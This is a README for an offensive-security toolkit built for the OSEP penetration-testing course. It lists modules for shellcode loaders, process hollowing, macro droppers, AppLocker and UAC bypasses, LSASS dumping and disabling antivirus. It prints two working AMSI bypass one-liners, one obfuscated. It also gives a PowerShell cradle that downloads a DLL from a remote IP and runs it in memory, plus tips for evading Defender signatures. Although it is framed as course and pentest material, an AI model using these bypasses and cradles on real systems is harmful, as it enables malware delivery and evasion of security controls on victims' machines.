OSEP Tools v2

A marriage between Octoberfest/OSEP-Tools and chvancooten/OSEP-Code-Snippets. Thanks to those guys for putting in the real work.

I made some changes to the repos obviously. The easiest way to see what I've done is check the commits and my Changelog section below. Basically what I did was just rewriting the documentation for the tools, and fix some small things here and there. I kept everything from OSEP-Tools, but only the projects that I deemed useful from OSEP-Code-Snippets.

Below is a small table of contents, some notes, my changelog, and then the disclaimer from the OG OSEP-Tools repo author.

ToC

Module	Description	SubModules
Active_Directory	Tools that may aid in AD enumeration/exploitation	sql
AppLocker_Bypass	Tools that may aid in bypassing AppLocker	altBypass, psBypass
Linux	Tools that aid in executing shells on a Linux box	Linux_Shellcode_Encoders, Linux_Shellcode_Loaders
Loaders_PEs	Tools that aid in loading EXEs (PEs) into memory, from disk, and executing	nonDN2J.hta
Loaders_Shellcode	Tools that aid in loading executable shellcode into memory from a remote server and executing	clhollow, clinject, D_invoke, powerhollow.py, powerinject.py
Macros	Tools that aid in executing shellcode either from memory or disk, from a word VBS Macro	WordMacroRunner.vbs, WordMacroRunnerBasic.vbs, vbObfuscate.ps1, WordPsCradle.vbs, WordMacroInject.vbs
Misc	Tools aiding in misc things like AV enumeration, automation, dumping LSASS memory, and RCE leveraging win32 API	AV_Stuff, Autos, Fileless_Lateral_Movement, MiniDump
Privilege_Escalation	Tools that aid in Windows PE	PrinSpoofer.Net, shakeitoff, UACBypass.ps1

Notes

Powershell AMSI bypass:

• Win10

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

• Win10+Win11

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

• Powershell Dll download cradle (replace ip/file name but leave rest as is when using D/invoke builder generated payloads!):

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.1.195/basic.dll');$assem = [System.Reflection.Assembly]::Load($data);$class = $assem.GetType("dll.Class1");$method = $class.GetMethod("runner");$method.Invoke(0, $null)  

With Powerinject/Powerhollow make sure you think about whether you will be calling PS download cradle from powershell or cmd.exe and use the appropriate mode when constructing payloads. When you call powershell.exe from cmd.exe or even from another powershell window, you are creating a child process and while the embedded AMSI bypass may work for the child process the parent process will detect the child performing malicious actions and flag it.

• Do NOT use msfvenom encoders with any Hollowing tool. Causes problems.

Injection tools

Your target for injection must be of the same integrity or lower than the method by which you have code execution. I.e. if you are running in medium integrity you cannot inject into spoolsv, inject into explorer.

Hollowing tools

Your target parent process for PPID spoofing must be of the same integrity or lower than the method by which you have code execution. I.e. if you are running in medium integrity you cannot specify spoolsv as the parent process. Hollowed process will inherit the integrity of parent process.

Discoveries

• Latest patch defender (Oct 2021) seems to have an "AND" based signature for AutoOpen(). It can be used in macros for benign purposes but as soon as API calls are included (or at least things used in shellcode runners), it flags signature based detection.
• RtlMoveMemory API call is signatured. Use RtlFillMemory instead.
• Resolve Amsi.dll and the function calls within it either dynamically or heavily obfuscated when you go to patch it.
• Meterpreter shells after using Migrate seem to get caught by defender sometimes... Doesn't seem to be the case for straight up injection payloads.

RESOURCES

• https://depthsecurity.com/blog/obfuscating-malicious-macro-enabled-word-docs
• https://secureyourit.co.uk/wp/2020/04/18/enumerating-process-modules-in-vba/

To DOs

• Implement dynamic AMSI search capability as seen here: https://secureyourit.co.uk/wp/2019/05/10/dynamic-microsoft-office-365-amsi-in-memory-bypass-using-vba/
• Update AV_Stuff scripts
  • Add AppLocker Rules disabling option to Get-AppLockerRules.ps1
  • Add DisableLSA script using my private notes
• Patch the x64_met_staged_reverseHttps* payloads in /bins bc they don't work. The tcp do.
  • Notes in the Loaders_Shellcode readme
• Integrate more of OSEP-Code-Snippets
• Update UACBypass.ps1

Changelog

• 11/25/2023
  • Initial commit; File structure changes, README updates/prettifying, repo merging
• 11/26/2023
  • Updated WordMacroInject.vbs to be able to inject when ran from a 32-bit Word process
  • Updated WordMacroInject.vbs to enumerate 32-bit processes and inject into a process other than WINWORD.exe
  • Updated Disable-AVProduct.ps1 to better enumerate security products
  • Added Misc/Autos directory to automate common processes; Added Create-Admin.ps1
• 12/01/2023
  • Updated Disable-AVProduct.ps1 to actually disable windows defender (using provided cmdlets/registry keys, nothing crazy)
  • More thorough minifying of Disable-AVProduct.min.ps1
  • Fix powerhollow.py and powerinject.py payloads to not fail if no Amsi found
  • Add input checks to ensure hollowing targets are valid
• 12/03/2023
  • Compile all projects to single directory for ease of access
• 12/13/2023
  • Fix D_invoke dependency issue. Modify underlying build command to allow build error debugging
  • Add reverse shell functionality to altbypass
  • Add new formatter bin_to_vbappArray.py
  • Update powerinject.py payloads to always execute in a 64-bit process

Disclaimer

@Octoberfest7

All of these tools were developed for use in the OSEP course. During development of them, as I learned more, in many cases I went above and beyond what the course taught because I figured "Why not build things against latest patch AV?". That is not to say that all of the things in this repo are now beating Live Defender; however at one point or another, most of them were. I hope that they may be of use to others, either for direct usage or to serve as inspiration for further work.

There is very little in terms of actual novel tradecraft here; it is a combination of a myriad of resources provided by people far smarter than I. The majority of the heavy lifting I did here was towards automation. I wanted an easy, standardized way to generate payloads for use in the OSEP course. All powershell and C# payloads contained within this repo utilize AES-256 encryption on the shellcode as well as a sleep statement for sandbox detection/evasion.

I offer no guarantees of any kind when using this stuff. Nothing in here was designed for public release, I am doing so after many requests. Make sure you read the notes provided on each tool in this README.